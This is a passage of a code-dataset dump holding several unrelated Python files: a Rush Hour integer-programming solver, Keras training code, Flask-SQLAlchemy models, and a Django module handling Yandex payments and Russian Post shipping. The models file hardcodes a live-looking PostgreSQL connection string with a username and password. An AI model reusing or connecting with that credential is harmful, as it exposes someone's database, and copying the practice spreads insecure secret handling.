self._contChannel.send_json(RegisterMsg(self._label))\n logging.debug(\"Register message sent for %s.\" % self._label)\n\n\n def unregister(self):\n \"\"\"\n Send an unregister message to the target.\n\n \"\"\"\n self._contChannel.send_json(UnregisterMsg(self._label))\n logging.debug(\"Unregister message sent for %s.\" % self._label)\n\n\n def sendShutdown(self):\n \"\"\"\n Tells the Receiver to shut down.\n This method mostly here for convenience in tests.\n\n \"\"\"\n self._contChannel.send_json(ShutdownMsg())\n logging.debug(\"Shutdown message sent.\")\n","sub_path":"src/python/WMCore/Alerts/ZMQ/Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157037937","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tt/actions/write/stop.py\n# Compiled at: 2020-03-21 10:42:53\n# Size of source mod 2**32: 513 bytes\nfrom tt.dataaccess.utils import get_data_store\nfrom tt.actions.utils.utils import ensure_working\nfrom tt.dateutils.dateutils import formatted_str_for_isotime_str\n\ndef action_stop(colorizer, time):\n data = get_data_store().load()\n ensure_working(data)\n current = data['work'][(-1)]\n current['end'] = time\n get_data_store().dump(data)\n print('So you stopped working on ' + colorizer.red(current['name']) + ' at ' + colorizer.yellow(formatted_str_for_isotime_str(time, '%H:%M')) + '.')","sub_path":"pycfiles/tt_time_tracker-1.0.2-py3.6/stop.cpython-36.py","file_name":"stop.cpython-36.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140866423","text":"import sys\nimport time\nfrom _2_gibbs_sample import gibbsSampler\n\nwith open(sys.argv[1], \"r\")as file:\n data = file.readlines()\nnums = 
data[0].split(\" \")\nk = int(nums[0].strip())\nt = int(nums[1].strip())\nn = int(nums[2].strip())\ndna = []\nfor i in range(1, len(data)):\n dna.append(data[i].strip())\n\n\nstart = time.time()\nprint(\"Starting...\")\n# with open(\"res.txt\", \"w\")as res:\n# for i in range(1000):\n# bestmotifs, bestscore = randomized_motif_search(dna, k, t)\n# res.write(\"{}: {}\\n\".format(\", \".join(bestmotifs), str(bestscore)))\n\nresmotifs = []\nresscore = 10000000\nfor i in range(20):\n x = time.time()\n bestmotifs, bestscore = gibbsSampler(dna, k, t, n, x)\n if i == 0 or bestscore < resscore:\n resmotifs = bestmotifs\n resscore = bestscore\n\nprint(\"{}:{}\".format(resmotifs, resscore))\n\nend = time.time()\nprint(\"Done! That took {} seconds\".format(str(end-start)))\n","sub_path":"week4/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652043586","text":"from datetime import datetime\r\nimport pytz\r\n\r\nfile = '1541962108935000000_167_838.h5'\r\ncern_time=pytz.timezone('Europe/Zurich')\r\nunix_time=float(file[:18])/100000000\r\nutc=datetime.utcfromtimestamp(unix_time)\r\nprint(\"Time in UTC is\",utc)\r\ncern=pytz.utc.localize(utc).astimezone(cern_time)\r\nprint(\"Time in Switzerland/CERN is\",cern)\r\n","sub_path":"Awake/other_files/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"10321443","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport gurobipy as gu\n\n\n\ndifficultyValues = [14, 25, 31, 50]\n\ndef solve(map, difficulty, verbose, isRHC):\n if (verbose):\n print(\"Début de la résolution\")\n m = gu.Model(\"RushHour\")\n initialConditions = initConds(map, difficulty, m, verbose)\n m, X, Y, Z = genConstraintsAndVariables(m, map, initialConditions, verbose)\n if (verbose):\n print(\"Affectation de la 
fonction objectif\")\n toSum = []\n coeffs = []\n vehicules, cases, tours, posInitiale, isVertical, longueur, P = initialConditions\n for i in vehicules:\n for j in cases:\n for l in cases:\n for k in tours:\n try:\n toSum.append(Y[(i,j,l,k)])\n coeffs.append((len(P[(j,l)])-1) if isRHC else 1)\n except:\n pass\n m.setObjective(gu.quicksum(toSum[i]*coeffs[i] for i in range(len(toSum))) , gu.GRB.MINIMIZE)\n m.setParam('OutputFlag', verbose)\n m.optimize()\n f = open(\"log.log\", \"w\")\n f2 = open(\"soluce.txt\", \"w\")\n solution = []\n for v in m.getVars():\n if (v.x == 1):\n print('%s' % (v.varName), file = f)\n if (v.varName[0] == 'Y'):\n s = v.varName.split(\"_\")\n if (verbose):\n print(\"Déplacer le véhicule %s de la case %s à la case %s\" % (s[1], s[2], s[3]))#, file = f2)\n solution.append(\"Déplacer le véhicule %s de la case %s à la case %s\" % (s[1], s[2], s[3]))\n f.close()\n f2.close()\n return solution\n\ndef genConstraintsAndVariables(m, map, initialConditions, verbose):\n #extraction des variables\n vehicules, cases, tours, posInitiale, isVertical, longueur, P = initialConditions\n width, height = map[0]\n #définition des conteneurs pour les variables de décision\n X = {}\n Y = {}\n Z = {}\n\n #variables\n if (verbose):\n print(\"Création des variables de décision\")\n for k in tours:\n for i in vehicules:\n casesOccupables = set()\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n X[(i,j,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"X_%s_%s_%s\" % (i,j,k))\n autresCasesAccessibles = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n autresCasesAccessibles.remove(j)\n for l in autresCasesAccessibles:\n Y[(i,j,l,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"Y_%s_%s_%s_%s\" % (i,j,l,k))\n casesOccupables.add(j)\n if (isVertical[i]):\n for a in range(1,longueur[i]):\n casesOccupables.add(max(casesOccupables) + width)\n else:\n for a in range(1,longueur[i]):\n casesOccupables.add(max(casesOccupables) + 1)\n 
for j in casesOccupables:\n Z[(i,j,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"Z_%s_%s_%s\" % (i,j,k))\n #print(Z[('t1', 36, 5)])\n if (verbose):\n print(\"Variables de décision créées\")\n\n #contraintes\n if (verbose):\n print(\"Création des contraintes du PL\")\n #D'abord on instaure les contraintes de départ\n# tours = tours[1:]\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n if (j == posInitiale[i]):\n m.addConstr(X[(i, j, 0)] == 1)\n else:\n m.addConstr(X[(i, j, 0)] == 0)\n for j in rangeeDeCases(posInitiale[i], isVertical[i], map):\n if (j in getCasesOccupees(posInitiale[i], isVertical[i], longueur[i], P, map)):\n m.addConstr(Z[(i, j, 0)] == 1)\n else:\n m.addConstr(Z[(i ,j ,0)] == 0)\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n m.addConstr(Y[(i,j,l,0)] == 0)\n\n\n #Puis on crée les contraintes de transition\n #contrainte 1\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for mm in getCasesOccupees(j, isVertical[i], longueur[i], P, map):\n tmp.append(Z[(i, mm, k)])\n m.addConstr(longueur[i] * X[(i,j,k)] <= gu.quicksum(tmp))\n\n #contrainte 2\n for j in cases:\n for k in tours:\n tmp = []\n for i in vehicules:\n try:\n tmp.append(Z[(i,j,k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= 1)\n\n #contrainte 3\n for i in vehicules:\n for k in tours:\n tmp = []\n for j in rangeeDeCases(posInitiale[i], isVertical[i], map):\n tmp.append(Z[(i,j,k)])\n m.addConstr(gu.quicksum(tmp) == longueur[i])\n\n #contrainte b\n for k in tours:\n tmp = []\n for j in cases:\n for l in cases:\n for i in vehicules:\n try:\n tmp.append(Y[(i,j,l,k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= 1)\n\n #--------------------\n tours = tours[1:]\n #On fait ceci car les contraintes 
4 et c ne doivent pas être appliquées pour k = 0\n\n #contrainte a\n for k in tours:\n tmp = []\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n tmp.append(Y[(i,j,l,k)])\n m.addConstr(gu.quicksum(tmp) == (1-X[('g', 17, k-1)]))\n\n\n #contrainte 4\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n for k in tours:\n for p in P[(j,l)]:\n tmp = []\n vprime = vehicules.copy()\n vprime.remove(i)\n for iprime in vprime:\n try:\n tmp.append(Z[(iprime, p, k-1)])\n except:\n pass\n m.addConstr(Y[(i,j,l,k)] <= 1 - gu.quicksum(tmp))\n\n #contrainte c ( à faire pour tous les k != 0) (on accepte que les voitures soient téléportées sur le plateau lors de l'initialisation)\n for i in vehicules:\n for l in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for j in cases:\n try:\n tmp.append(Y[(i, j, l, k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= X[(i, l, k)])\n\n #contrainte supplémentaire qui dit que l'on ne peut déplacer une voiture de j à l que si elle était bien en j avant\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for l in cases:\n try:\n tmp.append(Y[(i, j, l, k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= X[(i, j, k-1)])\n\n #contrainte supplémentaire qui dit que les véhicules sont toujours quelque part\n for k in tours:\n for i in vehicules:\n tmp = []\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n tmp.append(X[(i,j,k)])\n m.addConstr(gu.quicksum(tmp) == 1)\n\n #contrainte supplémentaire qui maintient le marqueur des véhicules non 
déplacés\n for i in vehicules:\n for k in tours:\n tmp = []\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n tmp.append(Y[(i,j,l,k)])\n\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n m.addConstr(gu.quicksum(tmp) >= X[(i,j,k)] - X[(i,j,k-1)])\n m.addConstr(gu.quicksum(tmp) >= X[(i,j,k-1)] - X[(i,j,k)])\n if (verbose):\n print(\"Contraintes créées\")\n return m, X, Y, Z\n\ndef rangeeDeCases(marqueur, isVertical, map):#fini\n return casesAccessibles(marqueur, isVertical, 1, map)\n\ndef casesAccessibles(marqueur, isVertical, longueur, map):#fini\n res = []\n width, height = map[0]\n if (isVertical):\n tmp = marqueur\n while (tmp-width > 0):\n tmp -= width #on remonte en haut de la colonne\n for i in range(height - longueur +1):\n res.append(tmp)\n tmp += width #et on ajoute les cases en descendant\n else:\n tmp = marqueur\n while ((tmp-1) % width != 0):\n tmp -= 1\n for i in range(width - longueur +1):\n res.append(tmp)\n tmp += 1\n return res\n\n\ndef initConds(map, difficulty, m, verbose):#fini\n if (verbose):\n print(\"Lecture des conditions de départ\")\n width, height = map[0]\n matrice = map[1]\n\n cases = range(1, width*height +1)\n\n tours = range(0, difficultyValues[difficulty]+1)\n\n posInitiale = {}\n vehicules = []\n isVertical = {}\n V = {}\n P = calculerP(map)\n M = {}\n visited = np.zeros(getCaseIndex(width, height-1, map), dtype=bool)\n for y in range(height):\n for x in range(width):\n cur = matrice[y][x]\n case = getCaseIndex(x+1,y,map)\n if (cur != '0' and (not visited[case-1])):\n vehicules.append(cur)\n posInitiale[cur] = case\n if (cur[0] == 't'):\n V[cur] = 3\n else:\n V[cur] = 2\n if ((x == width-1) or (matrice[y][x+1] != cur)):\n isVertical[cur] = True\n else:\n isVertical[cur] = False\n co = getCasesOccupees(posInitiale[cur], isVertical[cur], V[cur], P, 
map)\n M[(cur, case)] = co\n for c in co:\n visited[c-1] = True\n visited[case-1] = True\n if (verbose):\n print(\"Fin de la lecture des conditions de départ\")\n return vehicules, cases, tours, posInitiale, isVertical, V, P\n\n\ndef getCasesOccupees(marqueur, isVertical, longueur, P, map):#fini\n width, height = map[0]\n if (isVertical):\n return P[(marqueur, marqueur + (longueur-1)*width)]\n else:\n return P[(marqueur, marqueur + (longueur-1))]\n\ndef getCaseIndex(x,y, map):#fini\n width, height = map[0]\n return x + y*width\n\ndef calculerP(map):#fini\n P = {}\n width, height = map[0]\n for x1 in range(width):\n for y1 in range(height):\n for x2 in range(width):\n case1 = getCaseIndex(x1+1, y1, map)\n case2 = getCaseIndex(x2+1, y1, map)\n P[(case1, case2)] = []\n for x3 in robustRange(x1, x2):\n P[(case1, case2)].append(getCaseIndex(x3+1, y1, map))\n for y2 in range(height):\n case1 = getCaseIndex(x1+1, y1, map)\n case2 = getCaseIndex(x1+1, y2, map)\n P[(case1, case2)] = []\n for y3 in robustRange(y1, y2):\n P[(case1, case2)].append(getCaseIndex(x1+1, y3, map))\n return P\n\ndef robustRange(x1, x2):#fini\n if (x1 > x2):\n return range(x2, x1+1)\n else:\n return range(x1, x2+1)\n\n#import time\n#start = time.clock()\n#\n#import reader\n#test = \"puzzles/test/test4.text\"\n#deb = \"puzzles/débutant/jam1.txt\"\n#map = reader.read(\"puzzles/expert/jam40.txt\")\n#solve(map, 3, True, False)\n#print(time.clock() - start)","sub_path":"pl.py","file_name":"pl.py","file_ext":"py","file_size_in_byte":12356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4148693","text":"from sqlalchemy import Column, String, create_engine, Integer, Date\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import date\nimport json\nimport os\n\n\ndatabase_path = \"postgres://qmuctnxsjzynmq:caaa92f73f104bc8eaf93ab5b71a13adec2d14616f4eac78575a109a0a6e4896@ec2-52-70-67-123.compute-1.amazonaws.com:5432/d5o744grfo2435\"\n# database_path 
= \"postgres:///m_db\"\ndb = SQLAlchemy()\n\n\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n # db.create_all()\n\n# def db_insert_all():\n# db.drop_all()\n# db.create_all()\n# add_actor = Actor('atheer', 'Female', '20')\n# add_movie = Movie('hloe word ', date.today())\n# add_actor.insert()\n# add_movie.insert()\n# db.session.commit()\n\n'''\nActor\n'''\n\nclass Actor(db.Model):\n __tablename__ = 'actors'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n age = Column(Integer)\n gender = Column(String)\n\n def __init__(self, name, gender, age):\n self.name = name\n self.age = age\n self.gender = gender\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'age': self.age,\n 'gender': self.gender}\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n'''\nMovie\n'''\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n release_date = Column(Date)\n\n def __init__(self, title, release_date):\n self.title = title\n self.release_date = release_date\n\n def format(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'release_date': self.release_date}\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n","sub_path":" Capstone_Project_udacity_V.2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"67518940","text":"# -*- coding: utf-8 -*-\r\n\r\nimport finicityapi.models.birthday\r\n\r\nclass CreateConsumerRequest(object):\r\n\r\n 
\"\"\"Implementation of the 'CreateConsumerRequest' model.\r\n\r\n TODO: type model description here.\r\n\r\n Attributes:\r\n first_name (string): The consumer first name(s) / given name(s)\r\n last_name (string): The consumer last name(s) / surname(s)\r\n address (string): The consumer’s street address\r\n city (string): The consumer’s city\r\n state (string): The consumer’s state\r\n zip (string): The consumer’s ZIP code\r\n phone (string): The consumer’s phone number\r\n ssn (string): The consumer’s 9-digit Social Security number (may\r\n include separators: nnn-nn-nnnn)\r\n birthday (Birthday): The consumer birth date\r\n email (string): The consumer’s email address\r\n suffix (string): The consumer suffix\r\n email_address (string): The consumer’s email address\r\n\r\n \"\"\"\r\n\r\n # Create a mapping from Model property names to API property names\r\n _names = {\r\n \"first_name\":'firstName',\r\n \"last_name\":'lastName',\r\n \"address\":'address',\r\n \"city\":'city',\r\n \"state\":'state',\r\n \"zip\":'zip',\r\n \"phone\":'phone',\r\n \"ssn\":'ssn',\r\n \"birthday\":'birthday',\r\n \"email_address\":'emailAddress',\r\n \"email\":'email',\r\n \"suffix\":'suffix'\r\n }\r\n\r\n def __init__(self,\r\n first_name=None,\r\n last_name=None,\r\n address=None,\r\n city=None,\r\n state=None,\r\n zip=None,\r\n phone=None,\r\n ssn=None,\r\n birthday=None,\r\n email_address=None,\r\n email=None,\r\n suffix=None,\r\n additional_properties = {}):\r\n \"\"\"Constructor for the CreateConsumerRequest class\"\"\"\r\n\r\n # Initialize members of the class\r\n self.first_name = first_name\r\n self.last_name = last_name\r\n self.address = address\r\n self.city = city\r\n self.state = state\r\n self.zip = zip\r\n self.phone = phone\r\n self.ssn = ssn\r\n self.birthday = birthday\r\n self.email = email\r\n self.suffix = suffix\r\n self.email_address = email_address\r\n\r\n # Add additional model properties to the instance\r\n self.additional_properties = 
additional_properties\r\n\r\n\r\n @classmethod\r\n def from_dictionary(cls,\r\n dictionary):\r\n \"\"\"Creates an instance of this model from a dictionary\r\n\r\n Args:\r\n dictionary (dictionary): A dictionary representation of the object as\r\n obtained from the deserialization of the server's response. The keys\r\n MUST match property names in the API description.\r\n\r\n Returns:\r\n object: An instance of this structure class.\r\n\r\n \"\"\"\r\n if dictionary is None:\r\n return None\r\n\r\n # Extract variables from the dictionary\r\n first_name = dictionary.get('firstName')\r\n last_name = dictionary.get('lastName')\r\n address = dictionary.get('address')\r\n city = dictionary.get('city')\r\n state = dictionary.get('state')\r\n zip = dictionary.get('zip')\r\n phone = dictionary.get('phone')\r\n ssn = dictionary.get('ssn')\r\n birthday = finicityapi.models.birthday.Birthday.from_dictionary(dictionary.get('birthday')) if dictionary.get('birthday') else None\r\n email_address = dictionary.get('emailAddress')\r\n email = dictionary.get('email')\r\n suffix = dictionary.get('suffix')\r\n\r\n # Clean out expected properties from dictionary\r\n for key in cls._names.values():\r\n if key in dictionary:\r\n del dictionary[key]\r\n\r\n # Return an object of this model\r\n return cls(first_name,\r\n last_name,\r\n address,\r\n city,\r\n state,\r\n zip,\r\n phone,\r\n ssn,\r\n birthday,\r\n email_address,\r\n email,\r\n suffix,\r\n dictionary)\r\n\r\n\r\n","sub_path":"finicityapi/models/create_consumer_request.py","file_name":"create_consumer_request.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"155093598","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\nfrom sklearn 
import metrics\nfrom sklearn.metrics import precision_score, recall_score, confusion_matrix, classification_report, accuracy_score, \\\n f1_score\nfrom keras.callbacks import LearningRateScheduler\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef dnn(X, val_x, y, val_y):\n num_labels = y.shape[1]\n\n # build model\n model = Sequential()\n model.add(Dense(512, input_shape=(40,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.3))\n\n model.add(Dense(256))\n model.add(Activation('relu'))\n model.add(Dropout(0.3))\n\n model.add(Dense(num_labels))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\n model.fit(X, y, batch_size=256, epochs=5000, validation_data=(val_x, val_y))\n\n\ndef dnns(X, val_x, y, val_y):\n num_labels = y.shape[1]\n nets = 5\n\n model = [0] * nets\n # model = [0 for k in range(5)]\n\n # build model\n for net in range(nets):\n model[net] = Sequential()\n\n model[net].add(Dense(512, input_shape=(40,)))\n model[net].add(Activation('relu'))\n model[net].add(Dropout(0.45))\n\n model[net].add(Dense(256))\n model[net].add(Activation('relu'))\n model[net].add(Dropout(0.45))\n\n model[net].add(Dense(num_labels))\n model[net].add(Activation('softmax'))\n\n model[net].compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='RMSprop')\n\n # 训练网络\n history = [0] * nets\n epochs = 132\n for j in range(nets):\n X_train2, X_val2, Y_train2, Y_val2 = X, val_x, y, val_y\n history[j] = model[j].fit(X, Y_train2, batch_size=256,\n epochs=epochs,\n validation_data=(X_val2, Y_val2), verbose=0)\n # score = model[j].evaluate(X_val2, Y_val2, batch_size=256)\n # print(\"processing model # \"+str(j) + \" _ \" + str(score))\n # for key in history[j].history.keys():\n # print(key)\n\n print(\"DNN {0:d}: Epochs={1:d}, Train accuracy={2:.5f}, Validation accuracy={3:.5f}\".format(\n j + 1, epochs, max(history[j].history['accuracy']), 
max(history[j].history['val_accuracy'])))\n\n\n return model,history,nets\n\ndef process_show(history,nets):\n # 图示训练过程\n net = -1\n name_title = ['Loss', 'Accuracy']\n fig = plt.figure(figsize=(64, 64))\n for j in range(nets):\n for i in range(0, 2):\n ax = fig.add_subplot(8, 8, i + 1)\n plt.plot(history[j].history[list(history[j].history.keys())[i]],\n label=list(history[j].history.keys())[i])\n plt.plot(history[j].history[list(history[j].history.keys())[i + 2]],\n label=list(history[j].history.keys())[i + 2])\n plt.xlabel('Epochs', fontsize=18)\n plt.ylabel(name_title[i], fontsize=18)\n plt.legend()\n plt.show()\n\n# 定义评价指标\ndef acc(y_test, prediction):\n ### PRINTING ACCURACY OF PREDICTION\n ### RECALL\n ### PRECISION\n ### CLASIFICATION REPORT\n ### CONFUSION MATRIX\n cm = confusion_matrix(y_test, prediction)\n recall = np.diag(cm) / np.sum(cm, axis=1)\n precision = np.diag(cm) / np.sum(cm, axis=0)\n\n print('Recall:', recall)\n print('Precision:', precision)\n print('\\n clasification report:\\n', classification_report(y_test, prediction))\n print('\\n confussion matrix:\\n', confusion_matrix(y_test, prediction))\n\n ax = sns.heatmap(confusion_matrix(y_test, prediction), linewidths=0.5, cmap=\"YlGnBu\")","sub_path":"AC_TAU/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"445439791","text":"\"\"\"\nApproach: Try to find the pattern and repeated sub-problems to use DP.\n\nsee that just by applied the decision making logic on the given array would be difficult. Try to check if this pattern\ncan be changed. One way would be to modify the array such that the indices of the new array go from 0 to max element of\nthe given array. 
Then you store the sum of same valued elements from the given array onto the respective indices.\n\n\"\"\"\n\nclass Solution:\n def deleteAndEarn(self, nums: List[int]) -> int:\n simplified = [0 ] *(max(nums ) +1)\n for i in (nums):\n simplified[i] += i\n\n # Approach 1:\n \"\"\"\n return self.helper(simplified, 0, 0)\n\n def helper(self, nums, index, earned):\n #base\n if index >= len(nums):\n return earned\n\n #choose to delete:\n case0 = self.helper(nums, index + 2, earned + nums[index])\n\n # choose not to delete:\n case1 = self.helper(nums, index + 1, earned)\n\n return max(case0, case1)\n \"\"\"\n dp = [[0 ] *2 for _ in range(len(simplified))]\n dp[0][1] = simplified[0]\n\n for i in range(len(simplified)):\n dp[i][0] = max(dp[ i -1][0], dp[ i -1][1])\n dp[i][1] = dp[ i -1][0] + simplified[i]\n return max(dp[-1])\n\"\"\"\nApproach 1:\nTC: O(2^n)\nSC: O(n)\nApproach 2:\nTC: O(n)\nSC: O(n)\n\"\"\"","sub_path":"Problem-1.py","file_name":"Problem-1.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489072453","text":"import datetime\nfrom Myshop.settings import YANDEX_ID, YANDEX_KEY, TEST_YANDEX_ID, TEST_YANDEX_KEY, RUSSIAN_POST_TOKEN, RUSSIAN_POST_KEY\n\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.shortcuts import render, redirect\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\n\nfrom orders.models import Order, OrderItem\nfrom yandex_checkout import Payment, Configuration\n\nfrom shop.models import Flavour\n\nimport json\nimport requests\nfrom django.http import HttpResponse\n\n\ndef payment_process(*args, order_id):\n Configuration.account_id = YANDEX_ID\n Configuration.secret_key = YANDEX_KEY\n # Configuration.account_id = TEST_YANDEX_ID\n # Configuration.secret_key = TEST_YANDEX_KEY\n order = Order.published.get(id=order_id)\n value 
= float(order.get_total_cost() + order.deliver_cost)\n\n json_yandex = {\n \"amount\": {\n \"value\": value,\n \"currency\": \"RUB\"\n },\n \"description\": 'Номер заказа: {} от {}'.format(order.id, order.created.date()),\n \"metadata\": {\n \"order_id\": order.id\n },\n \"capture\": True,\n \"confirmation\": {\n \"type\": \"redirect\",\n \"return_url\": \"https://mrpit.online\"\n },\n \"receipt\": {\n \"customer\": {\n \"full_name\": order.client.username,\n \"email\": order.email,\n \"phone\": order.phone\n },\n \"items\": [\n ]\n },\n }\n items = order.items.all()\n for item in items:\n item = {\n \"description\": item.flavour.product,\n \"quantity\": item.quantity,\n \"amount\": {\n \"value\": item.price,\n \"currency\": \"RUB\"\n },\n \"vat_code\": \"2\",\n \"payment_mode\": \"full_prepayment\",\n \"payment_subject\": \"commodity\"\n }\n json_yandex[\"receipt\"][\"items\"].append(item)\n delivery_item = {\n \"description\": \"Доставка\",\n \"quantity\": \"1\",\n \"amount\": {\n \"value\": order.deliver_cost,\n \"currency\": \"RUB\"\n },\n \"vat_code\": \"2\",\n \"payment_mode\": \"full_prepayment\",\n \"payment_subject\": \"commodity\"\n }\n json_yandex[\"receipt\"][\"items\"].append(delivery_item)\n\n payment = Payment.create(json_yandex)\n\n return redirect(payment.confirmation.confirmation_url)\n\n\nclass CsrfExemptSessionAuthentication(SessionAuthentication):\n def enforce_csrf(self, request):\n return None\n\n\nclass YandexNotifications(APIView):\n permission_classes = [AllowAny]\n authentication_classes = (CsrfExemptSessionAuthentication,)\n\n def post(self, request):\n event_json = json.loads(request.body)\n if event_json[\"event\"] == \"payment.succeeded\":\n order_id = int(event_json[\"object\"][\"metadata\"][\"order_id\"])\n order = Order.published.get(id=order_id)\n order.paid = True\n order.status = \"В работе\"\n order.save()\n # Отправляем письмо администрации об оплате заказа\n subject_pay = 'Заказ №{} оплачен!'.format(order.id)\n mail_from = 
'no-reply@mrpit.online'\n mail_to = ['admin@mrpit.online', 'nukez@inbox.ru']\n admin_message = 'Заказ №{} оплачен!
'\\\n 'Перейти в админку по ссылке'.format(order.id)\n mail = EmailMessage(subject_pay, admin_message, mail_from, mail_to)\n mail.content_subtype = \"html\"\n mail.send()\n\n for item in order.items.all():\n flavour = Flavour.published.get(id=item.flavour.id)\n if flavour.quantity > 0:\n flavour.quantity -= item.quantity\n if flavour.quantity == 0:\n flavour.for_offer = False\n # Отправка письма администрации о том, что товар из набора кончился и нужно формировать новый\n subject = 'Закончился вкус у товара'\n sender = 'no-reply@mrpit.online'\n message = 'Закончился вкус у товара. {} {}\\n' \\\n 'Необходимо проверить, есть ли товар в наборе и при необходимости переформировать' \\\n .format(flavour.name, flavour.product.name)\n send_mail(subject, message, sender, ['admin@mrpit.online'])\n else:\n flavour.quantity = 0\n\n flavour.save()\n # Если доставка в регионы, то создаём отправление в лк почты россии\n if order.city != 'Пермь':\n russian_post_create_delivery(order_id)\n return HttpResponse(status=200)\n elif event_json[\"event\"] == \"payment.waiting_for_capture\":\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=500)\n\n\ndef russian_post_create_delivery(order_id):\n order = Order.published.get(id=order_id)\n\n\n protocol = \"https://\"\n host = \"otpravka-api.pochta.ru\"\n token = RUSSIAN_POST_TOKEN\n key = RUSSIAN_POST_KEY\n\n request_headers = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json;charset=UTF-8\",\n \"Authorization\": \"AccessToken \" + token,\n \"X-User-Authorization\": \"Basic \" + key\n }\n\n path = \"/1.0/user/backlog\"\n\n new_orders = [{\n \"postoffice-code\": \"614961\",\n \"tel-address\": order.phone,\n \"surname\": order.last_name,\n \"given-name\": order.first_name,\n \"mail-direct\": 643,\n \"address-type-to\": \"DEFAULT\",\n \"index-to\": order.postal_code,\n \"region-to\": \"Заполнить регион!\",\n \"place-to\": order.city,\n \"street-to\": order.address,\n \"house-to\": \"Заполнить 
